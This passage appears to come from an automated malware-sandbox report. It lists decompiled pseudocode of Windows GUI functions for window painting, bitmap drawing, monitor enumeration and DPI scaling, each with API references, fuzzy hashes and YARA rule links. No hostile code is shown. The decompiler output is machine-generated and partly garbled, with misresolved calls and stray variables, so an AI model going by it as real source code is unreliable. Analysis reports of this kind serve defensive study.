                                            0x0096966c
                                            0x0096967b
                                            0x00969695
                                            0x009696a1
                                            0x009696a2
                                            0x009696a3
                                            0x009696a4
                                            0x009696a5
                                            0x009696b6
                                            0x009696b6
                                            0x00969658
                                            0x009696db
                                            0x009696e7
                                            0x009696fa
                                            0x00969701
                                            0x00969704
                                            0x00969707
                                            0x0096971e
                                            0x0096971e

                                            APIs
                                            • GetWindowLongA.USER32 ref: 009695DF
                                            • GetWindowRect.USER32 ref: 009695FA
                                            • OffsetRect.USER32 ref: 0096960F
                                            • GetWindowDC.USER32(00000000,?,?,?,00000000,?,00000000,000000EC), ref: 0096961D
                                            • GetWindowLongA.USER32 ref: 0096964E
                                            • GetSystemMetrics.USER32 ref: 00969663
                                            • GetSystemMetrics.USER32 ref: 0096966C
                                            • InflateRect.USER32(?,000000FE,000000FE), ref: 0096967B
                                            • GetSysColorBrush.USER32(0000000F), ref: 009696A8
                                            • FillRect.USER32 ref: 009696B6
                                            • ExcludeClipRect.GDI32(?,?,?,?,?,00000000,0096971F,?,00000000,?,?,?,00000000,?,00000000,000000EC), ref: 009696DB
                                            • ReleaseDC.USER32 ref: 00969719
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Rect$Window$LongMetricsSystem$BrushClipColorExcludeFillInflateOffsetRelease
                                            • String ID:
                                            • API String ID: 19621357-0
                                            • Opcode ID: 87b48100d9e73e4ae9ff1305d276ba9368e3b27d875a556ae7bd586ce9aa4565
                                            • Instruction ID: 7b9160c3182b3e31bfc9b611a7291649f6e529bbb4465932341558082d4c0a84
                                            • Opcode Fuzzy Hash: 87b48100d9e73e4ae9ff1305d276ba9368e3b27d875a556ae7bd586ce9aa4565
                                            • Instruction Fuzzy Hash: AC4100B2A00509ABDB11EAA8CD46EDFB7BDEF8A310F104151F904F7295D671AE058761
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00973E98, Relevance: 18.1, APIs: 12, Instructions: 133windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E00973E98(intOrPtr* __eax, void* __edx) {
				struct HDC__* _v8;
				struct HBITMAP__* _v12;
				void* _v16;
				struct tagPAINTSTRUCT _v80;
				int _v84;
				void* _v96;
				int _v104;
				void* _v112;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t38;
				struct HDC__* _t59;
				intOrPtr* _t88;
				intOrPtr _t107;
				void* _t108;
				struct HDC__* _t110;
				void* _t113;
				void* _t116;
				void* _t118;
				intOrPtr _t119;

				_t116 = _t118;
				_t119 = _t118 + 0xffffff94;
				_push(_t108);
				_t113 = __edx;
				_t88 = __eax;
				if( *((char*)(__eax + 0x1f8)) == 0 ||  *((intOrPtr*)(__edx + 4)) != 0) {
					if(( *(_t88 + 0x55) & 0x00000001) != 0 || E00972AA4(_t88) != 0) {
						_t38 = E009739BC(_t88, _t88, _t113, _t108, _t113);
					} else {
						_t38 =  *((intOrPtr*)( *_t88 - 0x10))();
					}
					return _t38;
				} else {
					_t110 = GetDC(0);
					 *((intOrPtr*)( *_t88 + 0x44))();
					 *((intOrPtr*)( *_t88 + 0x44))();
					_v12 = CreateCompatibleBitmap(_t110, _v104, _v84);
					ReleaseDC(0, _t110);
					_v8 = CreateCompatibleDC(0);
					_v16 = SelectObject(_v8, _v12);
					 *[fs:eax] = _t119;
					_t59 = BeginPaint(E00975D08(_t88),  &_v80);
					SetActiveWindow(_v8);
					 *((intOrPtr*)(_t113 + 4)) = _v8;
					E00973E98(_t88, _t113);
					 *((intOrPtr*)(_t113 + 4)) = 0;
					 *((intOrPtr*)( *_t88 + 0x44))( *[fs:eax], 0x973fea, _t116);
					 *((intOrPtr*)( *_t88 + 0x44))();
					BitBlt(_t59, 0, 0, _v104, _v84, _v8, 0, 0, 0xcc0020);
					EndPaint(E00975D08(_t88),  &_v80);
					_pop(_t107);
					 *[fs:eax] = _t107;
					_push(0x973ff1);
					SelectObject(_v8, _v16);
					DeleteDC(_v8);
					return DeleteObject(_v12);
				}
			}

























                                            0x00973e99
                                            0x00973e9b
                                            0x00973ea0
                                            0x00973ea1
                                            0x00973ea3
                                            0x00973eac
                                            0x00973eb8
                                            0x00973ed7
                                            0x00973ec5
                                            0x00973ecb
                                            0x00973ecb
                                            0x00973ff7
                                            0x00973ee1
                                            0x00973ee8
                                            0x00973ef1
                                            0x00973eff
                                            0x00973f0c
                                            0x00973f12
                                            0x00973f1e
                                            0x00973f2e
                                            0x00973f3c
                                            0x00973f4b
                                            0x00973f60
                                            0x00973f68
                                            0x00973f6f
                                            0x00973f76
                                            0x00973f8d
                                            0x00973f9b
                                            0x00973fa7
                                            0x00973fb8
                                            0x00973fbf
                                            0x00973fc2
                                            0x00973fc5
                                            0x00973fd2
                                            0x00973fdb
                                            0x00973fe9
                                            0x00973fe9

                                            APIs
                                            • GetDC.USER32 ref: 00973EE3
                                            • CreateCompatibleBitmap.GDI32(00000000,?), ref: 00973F07
                                            • ReleaseDC.USER32 ref: 00973F12
                                            • CreateCompatibleDC.GDI32(00000000), ref: 00973F19
                                            • SelectObject.GDI32(00000000,?), ref: 00973F29
                                            • BeginPaint.USER32(00000000,?,00000000,00973FEA,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00973F4B
                                            • SetActiveWindow.USER32(00000000,00000000,?,00000000,00973FEA,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00973F60
                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 00973FA7
                                            • EndPaint.USER32(00000000,?,00000000,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000,?), ref: 00973FB8
                                            • SelectObject.GDI32(00000000,?), ref: 00973FD2
                                            • DeleteDC.GDI32(00000000), ref: 00973FDB
                                            • DeleteObject.GDI32(?), ref: 00973FE4
                                              • Part of subcall function 009739BC: BeginPaint.USER32(00000000,?), ref: 009739E2
                                              • Part of subcall function 009739BC: EndPaint.USER32(00000000,?,00973AE3), ref: 00973AD6
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Paint$Object$BeginCompatibleCreateDeleteSelect$ActiveBitmapReleaseWindow
                                            • String ID:
                                            • API String ID: 4094168854-0
                                            • Opcode ID: fee05e17d5cbe525ad49bc240fa11a59f611bbf3b1c2569d65b29b589c5f1131
                                            • Instruction ID: e37fbc423c0bae003ad6a8599b41c9c49ee778d3349c8f1f0d34cd9d5afcee6c
                                            • Opcode Fuzzy Hash: fee05e17d5cbe525ad49bc240fa11a59f611bbf3b1c2569d65b29b589c5f1131
                                            • Instruction Fuzzy Hash: F6412EB6B00204AFDB10EBA8CD85F9EB7F8AF89700F108469F909DB251DA75DD04DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00965848, Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 109COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 88%
                                            			E00965848(struct HDC__* _a4, RECT* _a8, _Unknown_base(*)()* _a12, long _a16) {
				struct tagPOINT _v12;
				int _v16;
				struct tagRECT _v32;
				struct tagRECT _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t60;
				int _t61;
				RECT* _t64;
				struct HDC__* _t65;

				_t64 = _a8;
				_t65 = _a4;
				if( *0x99c92f != 0) {
					_t61 = 0;
					if(_a12 == 0) {
						L14:
						return _t61;
					}
					_v32.left = 0;
					_v32.top = 0;
					_v32.right = GetSystemMetrics(0);
					_v32.bottom = GetSystemMetrics(1);
					if(_t65 == 0) {
						if(_t64 == 0 || IntersectRect( &_v32,  &_v32, _t64) != 0) {
							L13:
							_t61 = _a12(0x12340042, _t65,  &_v32, _a16);
						} else {
							_t61 = 1;
						}
						goto L14;
					}
					_v16 = GetClipBox(_t65,  &_v48);
					if(GetDCOrgEx(_t65,  &_v12) == 0) {
						goto L14;
					}
					OffsetRect( &_v32,  ~(_v12.x),  ~(_v12.y));
					if(IntersectRect( &_v32,  &_v32,  &_v48) == 0 || _t64 != 0) {
						if(IntersectRect( &_v32,  &_v32, _t64) != 0) {
							goto L13;
						}
						if(_v16 == 1) {
							_t61 = 1;
						}
						goto L14;
					} else {
						goto L13;
					}
				}
				 *0x99c91c = E0096529C(7, _t60,  *0x99c91c, _t64, _t65);
				_t61 = EnumDisplayMonitors(_t65, _t64, _a12, _a16);
				goto L14;
			}















                                            0x00965851
                                            0x00965854
                                            0x0096585e
                                            0x0096588e
                                            0x00965894
                                            0x00965950
                                            0x00965958
                                            0x00965958
                                            0x0096589c
                                            0x009658a1
                                            0x009658ac
                                            0x009658b7
                                            0x009658bc
                                            0x00965925
                                            0x0096593d
                                            0x0096594e
                                            0x00965939
                                            0x00965939
                                            0x00965939
                                            0x00000000
                                            0x00965925
                                            0x009658c8
                                            0x009658d7
                                            0x00000000
                                            0x00000000
                                            0x009658e9
                                            0x00965901
                                            0x00965917
                                            0x00000000
                                            0x00000000
                                            0x0096591d
                                            0x0096591f
                                            0x0096591f
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00965901
                                            0x00965872
                                            0x00965887
                                            0x00000000

                                            APIs
                                            • EnumDisplayMonitors.USER32(?,?,?,?), ref: 00965881
                                            • GetSystemMetrics.USER32 ref: 009658A6
                                            • GetSystemMetrics.USER32 ref: 009658B1
                                            • GetClipBox.GDI32(?,?), ref: 009658C3
                                            • GetDCOrgEx.GDI32(?,?), ref: 009658D0
                                            • OffsetRect.USER32 ref: 009658E9
                                            • IntersectRect.USER32 ref: 009658FA
                                            • IntersectRect.USER32 ref: 00965910
                                              • Part of subcall function 0096529C: GetClassInfoExW.USER32 ref: 009652AD
                                              • Part of subcall function 0096529C: GetProcAddress.KERNEL32(73FA0000,00000000), ref: 0096531C
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Rect$IntersectMetricsSystem$AddressClassClipDisplayEnumInfoMonitorsOffsetProc
                                            • String ID: EnumDisplayMonitors
                                            • API String ID: 1778667085-2491903729
                                            • Opcode ID: ee86db20d58c1fbe1ac36c5d7dca06451818a152a9e5fe563a202e0d08ab685e
                                            • Instruction ID: 733338129e6c2bd30a15a2cf8f6b66fb03fd0ecb8b1182c55738766b7e315aff
                                            • Opcode Fuzzy Hash: ee86db20d58c1fbe1ac36c5d7dca06451818a152a9e5fe563a202e0d08ab685e
                                            • Instruction Fuzzy Hash: BD31F9B2A0560AEFDB10DFA8CC45EFFB7BCAB49750F414126F915E2201E6349A05CBA1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00973B14, Relevance: 16.7, APIs: 11, Instructions: 177windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00973B14(void* __eax, void* __ecx, struct HDC__* __edx) {
				struct tagRECT _v44;
				struct tagRECT _v60;
				void* _v68;
				int _v76;
				int _t79;
				void* _t134;
				int _t135;
				void* _t136;
				void* _t159;
				void* _t160;
				void* _t161;
				struct HDC__* _t162;
				intOrPtr* _t163;

				_t163 =  &(_v44.bottom);
				_t134 = __ecx;
				_t162 = __edx;
				_t161 = __eax;
				if( *((char*)(__eax + 0x1a8)) != 0 &&  *((char*)(__eax + 0x1a7)) != 0 &&  *((intOrPtr*)(__eax + 0x17c)) != 0) {
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x17c)))) + 0x20))();
				}
				_t78 =  *((intOrPtr*)(_t161 + 0x198));
				if( *((intOrPtr*)(_t161 + 0x198)) == 0) {
					L17:
					_t79 =  *(_t161 + 0x19c);
					if(_t79 == 0) {
						L27:
						return _t79;
					}
					_t79 =  *((intOrPtr*)(_t79 + 8)) - 1;
					if(_t79 < 0) {
						goto L27;
					}
					_v44.right = _t79 + 1;
					_t159 = 0;
					do {
						_t79 = E00956C88( *(_t161 + 0x19c), _t159);
						_t135 = _t79;
						if( *((char*)(_t135 + 0x1a5)) != 0 && ( *(_t135 + 0x50) & 0x00000010) != 0 && ( *((char*)(_t135 + 0x57)) != 0 || ( *(_t135 + 0x1c) & 0x00000010) != 0 && ( *(_t135 + 0x51) & 0x00000004) == 0)) {
							_v44.left = CreateSolidBrush(E0095F1A4(0xff000010));
							E00955854( *((intOrPtr*)(_t135 + 0x40)) - 1,  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)),  *((intOrPtr*)(_t135 + 0x44)) - 1,  &(_v44.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)));
							FrameRect(_t162,  &_v44, _v44);
							DeleteObject(_v60.right);
							_v60.left = CreateSolidBrush(E0095F1A4(0xff000014));
							E00955854( *((intOrPtr*)(_t135 + 0x40)),  *((intOrPtr*)(_t135 + 0x40)) +  *((intOrPtr*)(_t135 + 0x48)) + 1,  *((intOrPtr*)(_t135 + 0x44)),  &(_v60.right),  *((intOrPtr*)(_t135 + 0x44)) +  *((intOrPtr*)(_t135 + 0x4c)) + 1);
							FrameRect(_t162,  &_v60, _v60);
							_t79 = DeleteObject(_v68);
						}
						_t159 = _t159 + 1;
						_t75 =  &(_v44.right);
						 *_t75 = _v44.right - 1;
					} while ( *_t75 != 0);
					goto L27;
				}
				_t160 = 0;
				if(_t134 != 0) {
					_t160 = E00956CE4(_t78, _t134);
					if(_t160 < 0) {
						_t160 = 0;
					}
				}
				 *_t163 =  *((intOrPtr*)( *((intOrPtr*)(_t161 + 0x198)) + 8));
				if(_t160 <  *_t163) {
					do {
						_t136 = E00956C88( *((intOrPtr*)(_t161 + 0x198)), _t160);
						if( *((char*)(_t136 + 0x57)) != 0 || ( *(_t136 + 0x1c) & 0x00000010) != 0 && ( *(_t136 + 0x51) & 0x00000004) == 0) {
							E00955854( *((intOrPtr*)(_t136 + 0x40)),  *((intOrPtr*)(_t136 + 0x40)) +  *(_t136 + 0x48),  *((intOrPtr*)(_t136 + 0x44)),  &(_v44.bottom),  *((intOrPtr*)(_t136 + 0x44)) +  *(_t136 + 0x4c));
							if(RectVisible(_t162,  &(_v44.top)) != 0) {
								if(( *(_t161 + 0x54) & 0x00000080) != 0) {
									 *(_t136 + 0x54) =  *(_t136 + 0x54) | 0x00000080;
								}
								_v60.top = SaveDC(_t162);
								E0096DF90(_t162,  *((intOrPtr*)(_t136 + 0x44)),  *((intOrPtr*)(_t136 + 0x40)));
								IntersectClipRect(_t162, 0, 0,  *(_t136 + 0x48),  *(_t136 + 0x4c));
								SetActiveWindow(0);
								RestoreDC(_t162, _v76);
								 *(_t136 + 0x54) =  *(_t136 + 0x54) & 0x0000ff7f;
							}
						}
						_t160 = _t160 + 1;
					} while (_t160 < _v60.top);
				}
			}
















                                            0x00973b18
                                            0x00973b1b
                                            0x00973b1d
                                            0x00973b1f
                                            0x00973b28
                                            0x00973b46
                                            0x00973b46
                                            0x00973b49
                                            0x00973b51
                                            0x00973c36
                                            0x00973c36
                                            0x00973c3e
                                            0x00973d43
                                            0x00973d43
                                            0x00973d43
                                            0x00973c47
                                            0x00973c4a
                                            0x00000000
                                            0x00000000
                                            0x00973c51
                                            0x00973c55
                                            0x00973c57
                                            0x00973c5f
                                            0x00973c64
                                            0x00973c6d
                                            0x00973ca7
                                            0x00973cca
                                            0x00973cd5
                                            0x00973cdf
                                            0x00973cf4
                                            0x00973d17
                                            0x00973d22
                                            0x00973d2c
                                            0x00973d2c
                                            0x00973d31
                                            0x00973d32
                                            0x00973d32
                                            0x00973d32
                                            0x00000000
                                            0x00973c57
                                            0x00973b57
                                            0x00973b5b
                                            0x00973b64
                                            0x00973b68
                                            0x00973b6a
                                            0x00973b6a
                                            0x00973b68
                                            0x00973b75
                                            0x00973b7b
                                            0x00973b81
                                            0x00973b8e
                                            0x00973b94
                                            0x00973bc2
                                            0x00973bd4
                                            0x00973bda
                                            0x00973bdc
                                            0x00973bdc
                                            0x00973be8
                                            0x00973bf4
                                            0x00973c06
                                            0x00973c16
                                            0x00973c21
                                            0x00973c26
                                            0x00973c26
                                            0x00973bd4
                                            0x00973c2c
                                            0x00973c2d
                                            0x00973b81

                                            APIs
                                            • RectVisible.GDI32(?,?), ref: 00973BCD
                                            • SaveDC.GDI32(?), ref: 00973BE3
                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00973C06
                                            • SetActiveWindow.USER32(00000000,?,00000000,00000000,?,?), ref: 00973C16
                                            • RestoreDC.GDI32(?,?), ref: 00973C21
                                            • CreateSolidBrush.GDI32(00000000), ref: 00973CA2
                                            • FrameRect.USER32 ref: 00973CD5
                                            • DeleteObject.GDI32(?), ref: 00973CDF
                                            • CreateSolidBrush.GDI32(00000000), ref: 00973CEF
                                            • FrameRect.USER32 ref: 00973D22
                                            • DeleteObject.GDI32(?), ref: 00973D2C
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Rect$BrushCreateDeleteFrameObjectSolid$ActiveClipIntersectRestoreSaveVisibleWindow
                                            • String ID:
                                            • API String ID: 3061095598-0
                                            • Opcode ID: 76a5a9c60b6c75b2c64182b644ebec3a1c5e9076e537468cef5e54726b3461ba
                                            • Instruction ID: 1c9cd2ea31089b80d00e24511451bc269c0e472e2707dc92d8b3c2889e8fa075
                                            • Opcode Fuzzy Hash: 76a5a9c60b6c75b2c64182b644ebec3a1c5e9076e537468cef5e54726b3461ba
                                            • Instruction Fuzzy Hash: 3B513CB22043449FDB15EF29C8C4B6A77E8AF85304F048458FE898B29BD731EC45DB51
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00973D44, Relevance: 15.1, APIs: 10, Instructions: 123COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00973D44(void* __eax, void* __ecx, struct HDC__* __edx, void* __eflags, intOrPtr _a4) {
				struct HWND__* _v8;
				int _v12;
				int _v16;
				char _v20;
				struct tagRECT _v36;
				signed int _t54;
				intOrPtr _t59;
				int _t61;
				void* _t63;
				void* _t66;
				void* _t82;
				int _t98;
				struct HDC__* _t99;

				_t99 = __edx;
				_t82 = __eax;
				 *(__eax + 0x54) =  *(__eax + 0x54) | 0x00000080;
				_v16 = SaveDC(__edx);
				E0096DF90(__edx, _a4, __ecx);
				IntersectClipRect(__edx, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
				_t98 = 0;
				_v12 = 0;
				if((GetWindowLongA(E00975D08(_t82), 0xffffffec) & 0x00000002) == 0) {
					_t54 = GetWindowLongA(E00975D08(_t82), 0xfffffff0);
					__eflags = _t54 & 0x00800000;
					if((_t54 & 0x00800000) != 0) {
						_v12 = 3;
						_t98 = 0xa00f;
					}
				} else {
					_v12 = 0xa;
					_t98 = 0x200f;
				}
				if(_t98 != 0) {
					SetRect( &_v36, 0, 0,  *(_t82 + 0x48),  *(_t82 + 0x4c));
					DrawEdge(_t99,  &_v36, _v12, _t98);
					E0096DF90(_t99, _v36.top, _v36.left);
					IntersectClipRect(_t99, 0, 0, _v36.right - _v36.left, _v36.bottom - _v36.top);
				}
				SetActiveWindow(0);
				SetActiveWindow(0);
				_t59 =  *((intOrPtr*)(_t82 + 0x19c));
				if(_t59 == 0) {
					L12:
					_t61 = RestoreDC(_t99, _v16);
					 *(_t82 + 0x54) =  *(_t82 + 0x54) & 0x0000ff7f;
					return _t61;
				} else {
					_t63 =  *((intOrPtr*)(_t59 + 8)) - 1;
					if(_t63 < 0) {
						goto L12;
					}
					_v20 = _t63 + 1;
					_v8 = 0;
					do {
						_t66 = E00956C88( *((intOrPtr*)(_t82 + 0x19c)), _v8);
						_t107 =  *((char*)(_t66 + 0x57));
						if( *((char*)(_t66 + 0x57)) != 0) {
							E00973D44(_t66,  *((intOrPtr*)(_t66 + 0x40)), _t99, _t107,  *((intOrPtr*)(_t66 + 0x44)));
						}
						_v8 =  &(_v8->i);
						_t36 =  &_v20;
						 *_t36 = _v20 - 1;
					} while ( *_t36 != 0);
					goto L12;
				}
			}
















                                            0x00973d4f
                                            0x00973d51
                                            0x00973d53
                                            0x00973d5f
                                            0x00973d69
                                            0x00973d7b
                                            0x00973d80
                                            0x00973d84
                                            0x00973d99
                                            0x00973db3
                                            0x00973db8
                                            0x00973dbd
                                            0x00973dbf
                                            0x00973dc6
                                            0x00973dc6
                                            0x00973d9b
                                            0x00973d9b
                                            0x00973da2
                                            0x00973da2
                                            0x00973dcd
                                            0x00973ddf
                                            0x00973dee
                                            0x00973dfb
                                            0x00973e13
                                            0x00973e13
                                            0x00973e23
                                            0x00973e33
                                            0x00973e38
                                            0x00973e40
                                            0x00973e7f
                                            0x00973e84
                                            0x00973e89
                                            0x00973e95
                                            0x00973e42
                                            0x00973e45
                                            0x00973e48
                                            0x00000000
                                            0x00000000
                                            0x00973e4b
                                            0x00973e4e
                                            0x00973e55
                                            0x00973e5e
                                            0x00973e63
                                            0x00973e67
                                            0x00973e72
                                            0x00973e72
                                            0x00973e77
                                            0x00973e7a
                                            0x00973e7a
                                            0x00973e7a
                                            0x00000000
                                            0x00973e55

                                            APIs
                                            • SaveDC.GDI32 ref: 00973D5A
                                              • Part of subcall function 0096DF90: GetWindowOrgEx.GDI32(?), ref: 0096DF9E
                                              • Part of subcall function 0096DF90: SetWindowOrgEx.GDI32(?,?,?,00000000), ref: 0096DFB4
                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00973D7B
                                            • GetWindowLongA.USER32 ref: 00973D91
                                            • GetWindowLongA.USER32 ref: 00973DB3
                                            • SetRect.USER32 ref: 00973DDF
                                            • DrawEdge.USER32(?,?,?,00000000), ref: 00973DEE
                                            • IntersectClipRect.GDI32(?,00000000,00000000,?,?), ref: 00973E13
                                            • SetActiveWindow.USER32(00000000,00000000,000000F0,00000000,000000EC,?,00000000,00000000,?,?), ref: 00973E23
                                            • SetActiveWindow.USER32(00000000,00000000,00000000,000000F0,00000000,000000EC,?,00000000,00000000,?,?), ref: 00973E33
                                            • RestoreDC.GDI32(?,?), ref: 00973E84
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Window$Rect$ActiveClipIntersectLong$DrawEdgeRestoreSave
                                            • String ID:
                                            • API String ID: 2888107596-0
                                            • Opcode ID: 1049a256c50d8f23f726d968037045c0bbd0dc61efce5c47a1e8c7e6df98fed2
                                            • Instruction ID: 645e80b428e0a1c75408ed7f799076beb1d606f71e21bcb5869614663ff53007
                                            • Opcode Fuzzy Hash: 1049a256c50d8f23f726d968037045c0bbd0dc61efce5c47a1e8c7e6df98fed2
                                            • Instruction Fuzzy Hash: 80413172B00214ABDB10EBA8CC85FAE77BDAF85700F108155F908EB296DB75DD01D7A5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 0096F260, Relevance: 13.6, APIs: 9, Instructions: 150COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E0096F260(intOrPtr* __eax, int __ecx, int __edx) {
				char _t62;
				signed int _t64;
				signed int _t65;
				signed char _t107;
				intOrPtr _t113;
				intOrPtr _t114;
				int _t117;
				intOrPtr* _t118;
				int _t119;
				int* _t121;

				 *_t121 = __ecx;
				_t117 = __edx;
				_t118 = __eax;
				if(__edx ==  *_t121) {
					L29:
					_t62 =  *0x96f40c; // 0x0
					 *((char*)(_t118 + 0x98)) = _t62;
					return _t62;
				}
				if(( *(__eax + 0x1c) & 0x00000001) == 0) {
					_t107 =  *0x96f404; // 0x1f
				} else {
					_t107 =  *((intOrPtr*)(__eax + 0x98));
				}
				if((_t107 & 0x00000001) == 0) {
					_t119 =  *(_t118 + 0x40);
				} else {
					_t119 = MulDiv( *(_t118 + 0x40), _t117,  *_t121);
				}
				if((_t107 & 0x00000002) == 0) {
					_t121[1] =  *(_t118 + 0x44);
				} else {
					_t121[1] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
				}
				if((_t107 & 0x00000004) == 0 || ( *(_t118 + 0x51) & 0x00000001) != 0) {
					_t64 =  *(_t118 + 0x48);
					_t121[2] = _t64;
				} else {
					if((_t107 & 0x00000001) == 0) {
						_t64 = MulDiv( *(_t118 + 0x48), _t117,  *_t121);
						_t121[2] = _t64;
					} else {
						_t64 = MulDiv( *(_t118 + 0x40) +  *(_t118 + 0x48), _t117,  *_t121) - _t119;
						_t121[2] = _t64;
					}
				}
				_t65 = _t64 & 0xffffff00 | (_t107 & 0x00000008) != 0x00000000;
				if(_t65 == 0 || ( *(_t118 + 0x51) & 0x00000002) != 0) {
					_t121[3] =  *(_t118 + 0x4c);
				} else {
					if(_t65 == 0) {
						_t121[3] = MulDiv( *(_t118 + 0x44), _t117,  *_t121);
					} else {
						_t121[3] = MulDiv( *(_t118 + 0x44) +  *(_t118 + 0x4c), _t117,  *_t121) - _t121[1];
					}
				}
				 *((intOrPtr*)( *_t118 + 0x84))(_t121[4], _t121[2]);
				_t113 =  *0x96f40c; // 0x0
				if(_t113 != (_t107 &  *0x96f408)) {
					 *(_t118 + 0x90) = MulDiv( *(_t118 + 0x90), _t117,  *_t121);
				}
				_t114 =  *0x96f40c; // 0x0
				if(_t114 != (_t107 &  *0x96f410)) {
					 *(_t118 + 0x94) = MulDiv( *(_t118 + 0x94), _t117,  *_t121);
				}
				if( *((char*)(_t118 + 0x59)) == 0 && (_t107 & 0x00000010) != 0) {
					E0095F904( *((intOrPtr*)(_t118 + 0x68)), MulDiv(E0095F8E8( *((intOrPtr*)(_t118 + 0x68))), _t117,  *_t121));
				}
				goto L29;
			}













                                            0x0096f267
                                            0x0096f26a
                                            0x0096f26c
                                            0x0096f271
                                            0x0096f3ee
                                            0x0096f3ee
                                            0x0096f3f3
                                            0x0096f400
                                            0x0096f400
                                            0x0096f27b
                                            0x0096f285
                                            0x0096f27d
                                            0x0096f27d
                                            0x0096f27d
                                            0x0096f28e
                                            0x0096f2a2
                                            0x0096f290
                                            0x0096f29e
                                            0x0096f29e
                                            0x0096f2a8
                                            0x0096f2c1
                                            0x0096f2aa
                                            0x0096f2b8
                                            0x0096f2b8
                                            0x0096f2c8
                                            0x0096f302
                                            0x0096f305
                                            0x0096f2d0
                                            0x0096f2d3
                                            0x0096f2f7
                                            0x0096f2fc
                                            0x0096f2d5
                                            0x0096f2e6
                                            0x0096f2e8
                                            0x0096f2e8
                                            0x0096f2d3
                                            0x0096f30c
                                            0x0096f311
                                            0x0096f355
                                            0x0096f319
                                            0x0096f321
                                            0x0096f34c
                                            0x0096f323
                                            0x0096f338
                                            0x0096f338
                                            0x0096f321
                                            0x0096f36d
                                            0x0096f37b
                                            0x0096f383
                                            0x0096f396
                                            0x0096f396
                                            0x0096f3a4
                                            0x0096f3ac
                                            0x0096f3bf
                                            0x0096f3bf
                                            0x0096f3c9
                                            0x0096f3e9
                                            0x0096f3e9
                                            0x00000000

                                            APIs
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F299
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F2B3
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F2E1
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F2F7
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F32F
                                            • MulDiv.KERNEL32(?,?,?), ref: 0096F347
                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0096F391
                                            • MulDiv.KERNEL32(?,?,0000001F), ref: 0096F3BA
                                            • MulDiv.KERNEL32(00000000,?,0000001F), ref: 0096F3E0
                                              • Part of subcall function 0095F904: MulDiv.KERNEL32(00000000,?,00000048), ref: 0095F911
                                            Memory Dump Source
                                            • Source File: 00000003.00000002.283672356.0000000000941000.00000020.00020000.sdmp, Offset: 00940000, based on PE: true
                                            • Associated: 00000003.00000002.283662991.0000000000940000.00000002.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283725462.000000000099A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000003.00000002.283737362.00000000009A0000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
